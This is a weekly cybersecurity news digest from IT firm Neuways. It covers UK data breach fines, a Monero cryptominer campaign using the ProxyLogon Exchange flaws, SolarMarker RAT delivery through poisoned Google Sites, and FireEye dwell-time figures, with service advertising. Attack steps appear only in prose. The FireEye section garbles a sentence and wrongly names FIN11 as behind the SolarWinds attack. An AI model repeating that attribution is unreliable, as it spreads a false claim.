Welcome to the latest edition of the Neu Cyber Threats, a weekly series in which, we here at Neuways, bring attention to the latest cybersecurity threats in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:


Neu Cyber Threats

£42m in Data Breach Fines Issued to Businesses in 2020

The Information Commissioner’s Office (ICO) hit UK businesses with £42m in data breach fines last year. Fines were given out as a result of breaches of the Privacy and Electronic Communications Regulations (PECR) and the Data Protection Act (DPA).

The largest fine was handed to British Airways with just over half of the £42.41m total being paid by the airline, following a 2018 cyber attack which saw over half a million of its customers’ details stolen by cyber criminals.

The news highlights the need for businesses to improve their data management policies and secure the data they hold correctly. With the COVID-19 pandemic, many companies might have prioritised other areas of their business, forgetting about improvements to their cyber security measures. Read more on the story and what to be aware of, here.

Attackers Target ProxyLogon Exploit to Install Cryptojacker

Neu Cyber Threats

Microsoft Exchange servers have again been targeted, this time by cyber criminals to host malicious Monero cryptominer in an “unusual attack”. This latest hit to the Exchange servers follows the recent infamous ProxyLogon exploit.

It has been discovered that the threat actors were able to compromise the Exchange servers using the exploit —which suffered a whole range of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to webshells -to host Monero cryptomining malware.

The attack began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.

A script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, before deleting any evidence that it was there. The attack’s executable appears to contain a modified version of a tool publicly available called PEx64-Injector, which is described as having the ability to migrate files without requiring any administrator privileges. Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the system’s files. It configures the miner, injects it into a running process, then exits, with the damage done and running on the system.

Researchers observed the cryptominer receiving funds on 9th March 2021, which incidentally is also when Microsoft released updates to Exchange to patch the flaws. Although, the attacker lost several servers after this date and the overall activity from the miner decreased, other servers that were gained more than made up for the early losses. The ProxyLogon problem started for Microsoft in early March when the company said it has spotted multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange server. The four flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials – giving them access to email communications and the ability to install a web shell for further exploitation within the environment.

While Microsoft have already released an out-of-band update, with the company confirming that 92% of affected machines had been patched, much damage has already been done to businesses whose Exchange servers were affected by the issue, there still will be unpatched systems that remain vulnerable out there.

100,000 Google Sites Used to Install SolarMarker RAT

Cyber criminals are using search-engine optimisation (SEO) tactics to direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.

Business users are being lured to over 100,000 malicious Google sites that appear legitimate, but instead install a remote access trojan (RAT), used to gain a foothold on a network and later infect systems with ransomware, credential-stealers, banking trojans and other malware.

Hundreds of thousands of unique, malicious web pages that contain popular business terms and keywords, including business-form related keywords like template, invoice, receipt, questionnaire and resume, were found over the last week.

Cyber criminals use Google search re-direction and drive-by-download tactics to direct unsuspecting victims to the RAT— typically a person who visits the infected site simply executes a binary disguised as a PDF by clicking on a purported “form” — thus infecting his or her machine. This is an increasingly common trend with malware delivery, which speaks to the improved security of applications such as browsers that handle vulnerable code. Unfortunately, it reveals a glaring blind spot in controls, which allows users to execute untrusted binaries or script files at will.

The campaign is not only huge and far-reaching but sophisticated too. The common business terms serving as keywords for the threat actors’ search-optimisation strategy are convincing Google’s web crawler that the intended content meets conditions for a high page-rank score, which means the malicious sites will appear at the top of user searches, increasing the likelihood that victims will be lured to infected sites. Security heads and managers need to know that the threat group has gone to a lot of effort to compromise business professionals, spreading a wide net and using many tactics to successfully disguise their traps.

One recent incident was observed by researchers, in which a victim working in the financial industry was searching for a free version of a document online and was re-directed via Google Search to a Google sites page that was under the control of threat actors and included an embedded download button. It’s clear that the cyber criminals are targeting the right people, as someone working in the financial industry would be a “high-value target” of the campaign.

Once a RAT has been successfully installed on a victim’s computer, the hackers can upload additional malware to the device, such as a banking trojan, which could be used to hijack the online banking credentials of the business. Threat actors could also install a credential-stealer to harvest the employee’s email credentials and launch a business email compromise (BEC) scheme.

Neuways advises employees to consider what type of business forms, invoices, receipts etc, they use search for online. Through sharing this type of form on a centralised system such as Microsoft SharePoint, colleagues can share documents such as this, and avoid falling into sophisticated traps laid by cyber criminals. Our Phishing Awareness Training is top-of-the-class and makes businesses safer through the education of their employees. Contact us on 01283 753333 or hello@neuways.com to discuss your options with us.

Breaches Detected Faster, But Ransomware Surge a Major Factor: FireEye

Recent data has shown that the time it takes businesses to detect a malicious attack continues to drop and it’s mostly due to companies becoming better at detecting cyber attacks.

Data show that organisations are also getting better at detecting intrusions on their own but that the massive increase in ransomware attacks was another factor. Ransomware attacks are typically detected quickly since the attackers often make their presence known when they demand a ransom, after they have encrypted the victim’s files and/or have stolen the victim’s data.

In the ransomware attacks investigated by researchers, 78% had a dwell time of 30 days or less, and only 1% of these incidents had a dwell time of 700 days or more. As previously mentioned this could be due to the ease in which ransomware attacks can be operated. Rather than placing all of their eggs in one basket (or one cyber attack), cyber criminals can instead attack thousands of businesses all at once. 59% of the breaches investigated globally during this period were detected internally, while in comparison to 2019, 47% were discovered internally. The number of days an attacker is present in the target’s environment before they are discovered – the ‘dwell time’ – also decreased significantly in 2020 compared to the previous year, from 56 days to 24 days. In the case of external breach notifications, the median dwell time in 2020 was 73 days, while in the case of internal detection the dwell time was only 12 days.

Interestingly, the median global dwell time was just 5 days for ransomware, and 45 days for non-ransomware investigations. Overall, the global median dwell time has decreased constantly over the past decade, from 416 days in 2011 to 24 in 2020. New extortion techniques used by ransomware gangs are also noted in the data. The popular phishing and extortion campaigns conducted by a cybercrime group named FIN11, the threat group behind the SolarWinds supply chain attack, and malicious actors shifting focus to systems that support remote work. In terms of attack tactics, it was found that attackers used 63% of ‘MITRE ATT&CK’ techniques and 24 percent of sub- techniques throughout the analysed time frame. However, the company said, just 37% of the techniques observed (23% of all techniques) were seen in more than 5% of the intrusions it investigated.

Neuways advises businesses to be constantly aware of the threat of phishing campaigns, ransomware and cyber criminals. The rise of ransomware is often attributed to the amount of chaos and disruption that businesses have gone through over the last 12 months, between an increase in remote working and national lockdowns. As the UK emerges out of lockdown, businesses must prepare themselves for a continuation of ransomware-filled phishing campaigns – employees should remain vigilant when answering emails in their inboxes or phone numbers, that they are not falling victim to cyber criminals aiming to extort them for their company’s money.

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.